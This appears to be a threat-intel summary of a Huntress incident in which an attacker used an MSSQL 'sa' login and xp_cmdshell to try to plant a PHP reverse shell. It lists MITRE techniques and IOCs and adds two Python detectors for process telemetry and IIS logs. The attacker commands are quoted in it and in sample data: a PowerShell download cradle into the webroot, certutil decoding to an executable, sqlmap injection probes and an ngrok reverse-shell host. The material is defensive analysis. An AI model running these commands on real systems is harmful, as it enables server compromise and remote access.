Two-day activity on a Windows Server MSSQL-enabled endpoint shows a threat actor attempting to upload a reverse shell to a web server, using PowerShell, certutil, and publicly available PHP reverse shell code. Windows Defender repeatedly detected and quarantined the malicious files as the actor tried multiple delivery methods and server-side script downloads. #VirToolPHPMeterpreter #hightidAOaa
Keypoints
- The targeted endpoint was a Windows Server 2019 Essentials system monitored by Huntress, with this incident the first alert on that host after more than a year of monitoring.
- The attacker attempted to use MSSQL sa credentials to upload a reverse shell to the web server, indicating abuse of a default account in the environment.
- VirTool:PHP/Meterpreter.A!MTB was detected by Windows Defender on maa.php, signaling the use of PHP-based reverse shell payloads.
- certutil.exe was used to decode a file on the endpoint, highlighting LOLBin usage to stage or decode payloads.
- PowerShell commands were run via sqlservr.exe, including Invoke-WebRequest calls to fetch maa.php and fata.php from GitHub locations.
- Day 1 saw a 404 GET for maa.php from 41.102.167.182 and successful sqlmap queries from 35.195.172.146: probing and attempted exploitation that ultimately failed to land a shell.
- Day 2 repeated the PowerShell/certutil activity, attempted another download (fata.php), and culminated in attempts to set up a reverse shell through a tunneled host (0.tcp.eu.ngrok.io); no working shell was uploaded.
- The conclusion emphasizes basic IT hygiene: asset inventory and attack surface reduction, which means removing unneeded services (such as exposed MSSQL) or, where they must stay, ensuring they are properly secured and patched.
MITRE Techniques
- [T1078.001] Default Accounts – The threat actor operated through the built-in MSSQL ‘sa’ login, a default account, and used that access to attempt the reverse shell upload. “the threat actor attempted to use their access to the MSSQL ‘sa’ account in an attempt to upload a reverse shell to the web server.”
- [T1059.001] PowerShell – Execution of PowerShell scripts/commands via sqlservr.exe. “powershell -command Invoke-WebRequest -Uri ‘https[:]//raw.githubusercontent[.]com/hightidAOaa/azdaz/main/maa.php’ -OutFile ‘E:/inetpub/wwwroot/<REDACTED>/maa.php’ “
- [T1059.003] Windows Command Shell – xp_cmdshell, which runs OS commands through cmd.exe under the SQL Server service process, was initially blocked and then enabled by flipping its configuration option. “access to the xp_cmdshell stored procedure was blocked” and “xp_cmdshell stored procedure configuration was changed from ‘0’ to ‘1’, enabling the stored procedure.”
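The three techniques above leave one recognisable shape in process-creation telemetry: cmd.exe (and whatever it launches) descending from sqlservr.exe, a PowerShell download cradle, and certutil used as a decoder. The script below is an added example, not code from the Huntress write-up, that walks a parent/child chain over constructed Sysmon-style events and flags that shape. PIDs, install paths and the ping command used to stand in for the ngrok step are assumptions; the command lines echo what the page reports.

```python
"""Flag the xp_cmdshell execution chain in process-creation telemetry (added example)."""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Constructed sample events in Sysmon Event ID 1 style; not telemetry from the case.
# PIDs, the SQL Server install path and the ping placeholder are assumptions.
SAMPLE_EVENTS = [
    {"pid": 652, "ppid": 4, "image": r"C:\Windows\System32\services.exe", "cmdline": "services.exe"},
    {"pid": 1988, "ppid": 652,
     "image": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "cmdline": "sqlservr.exe -sMSSQLSERVER"},
    # xp_cmdshell spawns cmd.exe /c <command> directly under the SQL Server service process
    {"pid": 3012, "ppid": 1988, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -command Invoke-WebRequest -Uri "
                "'https://raw.githubusercontent.com/hightidAOaa/azdaz/main/maa.php' "
                "-OutFile 'E:/inetpub/wwwroot/<REDACTED>/maa.php'"},  # path redacted as on the page
    {"pid": 3020, "ppid": 3012, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -command Invoke-WebRequest -Uri "
                "'https://raw.githubusercontent.com/hightidAOaa/azdaz/main/maa.php' "
                "-OutFile 'E:/inetpub/wwwroot/<REDACTED>/maa.php'"},
    {"pid": 3044, "ppid": 1988, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c certutil -decode tmpfrckk.txt tmpseevcw.exe"},
    {"pid": 3050, "ppid": 3044, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -decode tmpfrckk.txt tmpseevcw.exe"},
    # Placeholder that references the tunnel host; the page gives no command line for that step
    {"pid": 3060, "ppid": 1988, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c ping -n 1 0.tcp.eu.ngrok.io"},
    # Benign activity that must not fire
    {"pid": 2200, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 4100, "ppid": 2200, "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    {"pid": 4300, "ppid": 2200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -command Get-Process sqlservr"},
]

SQL_SERVICE = "sqlservr.exe"
# Interpreters and LOLBins that have no business being children of the SQL Server service
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "bitsadmin.exe", "mshta.exe"}
DOWNLOAD_CRADLE = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer", re.I)
CERTUTIL_ABUSE = re.compile(r"(?:^|\s)[-/](?:decode|encode|urlcache|verifyctl)\b", re.I)
TUNNEL_HOST = re.compile(r"[\w.-]*ngrok\.io\b", re.I)


@dataclass
class Finding:
    pid: int
    image: str
    hits: list


def basename(image: str) -> str:
    return PureWindowsPath(image).name.lower()


def ancestors(ppid, by_pid):
    """Yield image basenames walking up the parent chain; stops at unknown PIDs or cycles."""
    seen = set()
    while ppid in by_pid and ppid not in seen:
        seen.add(ppid)
        event = by_pid[ppid]
        yield basename(event["image"])
        ppid = event["ppid"]


def detect(events):
    """Return one Finding per event that matches any of the four rules."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        cmd = e.get("cmdline", "")
        hits = []
        if name in SHELLS and SQL_SERVICE in set(ancestors(e["ppid"], by_pid)):
            hits.append("shell/LOLBin descended from sqlservr.exe (xp_cmdshell, T1059.003)")
        if name in {"powershell.exe", "pwsh.exe"} and DOWNLOAD_CRADLE.search(cmd):
            hits.append("PowerShell download cradle (T1059.001)")
        if name == "certutil.exe" and CERTUTIL_ABUSE.search(cmd):
            hits.append("certutil decode/download switch (LOLBin)")
        if TUNNEL_HOST.search(cmd):
            hits.append("ngrok tunnel host in command line")
        if hits:
            findings.append(Finding(e["pid"], name, hits))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"pid {f.pid:<5} {f.image:<15} {'; '.join(f.hits)}")
```

The ancestry walk matters more than the string matches: an administrator running `powershell -command Get-Process` from Explorer produces no finding, while the same binary launched two hops below sqlservr.exe does, regardless of what the command line says. That is the signal to alert on even when the payload changes.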
Indicators of Compromise
- [IP Address] 41.102.167.182 – GET request for maa.php (day 1)
- [IP Address] 35.195.172.146 – sqlmap queries (day 1)
- [URL] https://raw.githubusercontent.com/hightidAOaa/azdaz/main/maa.php – download source used to fetch maa.php
- [URL] https://raw.githubusercontent.com/hightidAOaa/azdaz/raw/main/fata.php – download source used to fetch fata.php
- [Domain] 0.tcp.eu.ngrok.io – host used for reverse shells
- [File] maa.php – web server file involved in the attempted reverse shell
- [File] fata.php – web server file involved in the attempted reverse shell
- [File] tmpfrckk.txt – decoded by certutil and passed into a new executable
- [File] tmpseevcw.exe – resulting executable from decoding tmpfrckk.txt
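The web-side indicators above (the two source IPs, the dropped filenames, the sqlmap traffic) are the kind that get swept across IIS access logs. The script below is an added example, not code from the Huntress write-up: it parses W3C extended log lines using the file's own #Fields directive and flags a line on any of the IOCs, and it goes one step beyond the page by also decoding the query string and matching generic injection probes so the same sweep catches sqlmap runs that spoof their User-Agent. The log lines, the /index.php target, the dates and the server IP are constructed.

```python
"""Sweep IIS W3C extended logs for the web-side IOCs from the case (added example)."""
import re
from urllib.parse import unquote_plus

# Constructed sample log in the default IIS 10 field order; not the real server logs.
# The target script, timestamps, server IP and benign client IPs are assumptions.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-01-01 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-01-01 10:00:01 10.0.0.5 GET /maa.php - 80 - 41.102.167.182 Mozilla/5.0 - 404 0 2 15
2024-01-01 10:05:12 10.0.0.5 GET /index.php id=1%20AND%201%3D1 80 - 35.195.172.146 sqlmap/1.7#stable+(https://sqlmap.org) - 200 0 0 40
2024-01-01 10:05:13 10.0.0.5 GET /index.php id=1%27%20AND%20SLEEP%285%29-- 80 - 35.195.172.146 sqlmap/1.7#stable+(https://sqlmap.org) - 200 0 0 5012
2024-01-01 11:00:00 10.0.0.5 GET / - 80 - 203.0.113.9 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 8
2024-01-01 11:30:00 10.0.0.5 GET /fata.php - 80 - 198.51.100.7 Mozilla/5.0 - 404 0 2 12
"""

IOC_IPS = {"41.102.167.182", "35.195.172.146"}
DROPPED_FILES = {"maa.php", "fata.php"}
SCANNER_UA = re.compile(r"sqlmap", re.I)
# Generic injection probes: boolean tautologies, time-based delays, UNION-based extraction
SQLI_PROBE = re.compile(r"(?i)\b(?:and|or)\b\s+\d+=\d+|sleep\s*\(|union\s+select|waitfor\s+delay")


def parse_w3c(text):
    """Yield (line_no, record) for every data line, keyed by the names in #Fields."""
    fields = None
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data line before #Fields directive")
        values = line.split(" ")
        if len(values) != len(fields):  # skip truncated or malformed lines
            continue
        yield n, dict(zip(fields, values))


def sweep(text):
    """Return a list of {line, c-ip, reasons} for every line matching an indicator."""
    findings = []
    for n, rec in parse_w3c(text):
        reasons = []
        if rec.get("c-ip") in IOC_IPS:
            reasons.append(f"known attacker IP {rec['c-ip']}")
        stem = rec.get("cs-uri-stem", "").rsplit("/", 1)[-1].lower()
        if stem in DROPPED_FILES:
            reasons.append(f"request for dropped file {stem} (status {rec.get('sc-status')})")
        if SCANNER_UA.search(unquote_plus(rec.get("cs(User-Agent)", "-"))):
            reasons.append("sqlmap user agent")
        query = unquote_plus(rec.get("cs-uri-query", "-"))  # IIS logs the query URL-encoded
        if query != "-" and SQLI_PROBE.search(query):
            reasons.append("SQL injection probe in query")
        if reasons:
            findings.append({"line": n, "c-ip": rec["c-ip"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in sweep(SAMPLE_LOG):
        print(f"line {f['line']:>3} {f['c-ip']:<16} {'; '.join(f['reasons'])}")
```

A request for maa.php or fata.php from an address outside the IOC list (the last sample line) is still worth a look: it means either a second operator or a scanner that knows the filename, and it is exactly the case a pure IP block list would miss.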
Read more: https://huntress.com/blog/managing-attack-surface